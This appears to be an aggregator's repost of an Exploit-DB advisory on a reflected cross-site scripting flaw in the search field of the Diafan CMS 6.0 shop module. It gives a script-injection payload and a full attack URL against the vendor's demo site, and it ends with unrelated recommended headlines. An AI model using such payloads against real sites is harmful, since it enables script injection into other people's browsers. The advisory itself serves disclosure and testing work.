[webapps] Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

1 year ago

source link: https://www.exploit-db.com/exploits/51529
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

EDB-ID:

51529

EDB Verified:

Exploit:

Platform:

PHP

Date:

2023-06-19

Vulnerable App:

# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com


Description:

1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button : 
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

Copy

Recommend

[webapps] Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

EDB-ID:

51529

Platform:

PHP

Date:

2023-06-19

Recommend

腾挪：2023年中国RPA行业研究报告

【TRO 22-cv-620】正在冻结！Purple Pillow紫色枕头发起商标维权，起诉店铺24家

Ford: The US can't compete with China on electric vehicles, for now | TechSpot

Vimeo launches AI-based editing tools for video creators

3 downsides of generative AI for cloud operations

Former Byju's Employee Expresses Gratitude Despite Sudden Resignation Request

LCD TVs Won't See Any Further Development - Slashdot

【投资视角】启示2023：中国内燃机行业投融资及兼并重组分析(附投融资汇总、产业园和...

Remember "Me"? Most PC owners, and even Microsoft, would like to forge...

Global Master of Public Health

About Joyk